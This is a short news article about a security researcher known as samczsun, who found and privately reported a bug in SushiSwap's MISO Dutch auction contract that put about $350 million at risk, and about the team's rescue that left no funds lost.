White Hat Saves SushiSwap from a Potential Loss of $350 million
Sophia Cruz • 2 min read
A group of security researchers saved SushiSwap, a decentralized exchange, from a potential loss of 109,000 ETH or $350 million. A security researcher from Paradigm, known on Twitter as “samczsun,” identified a flaw in a dutch auction smart contract found on the MISO platform. In his blog, samczsun described how he began examining the smart code for BitDAO token sale at MISO, which is SushiSwaps token fundraising platform. Upon looking closer, he found a bug in the MISO Dutch auction contract, whereby there was no access control for some functions, which was extremely concerning.
Following deeper inspection, the white hat found a vulnerability that, if exposed, could have led to all of the remaining cryptocurrencies in the auction contract being hacked by a malicious actor. The attacker could have used the same ETH repeatedly, to batch multiple calls to the agreement, and bid in the auction for free, possibly even triggerering a big refund. Samczsun then realized that he had discovered a $350 million bug.
After testing the vulnerability, samczsun requested further verification from his colleagues, Georgios Konstantopoulos and Dan Robinson; then, they reached out to the team at SushiSwap to alert them to the bug in the Dutch Auction contract, MISO. SushiSwap CTO formulated a rescue plan before any hackers could discover the gap.
The BitDAO team immediately canceled the auction manually, by purchasing the remaining allocation, in order to safeguard the funds. Thanks to the tip, SushiSwap discovered that no funds were lost during the process. MISO Dutch auction will pause its operations until the next smart contract update.
The DeFi space has been under a series of consecutive attacks in recent months, including the attacks on Poly Network and Neko Network. With the flourishing growth of DeFi in the crypto world, regulatory commissions are looking into tightening security on this platform, because it is not every day that we come accross this kind of DeFi superhero.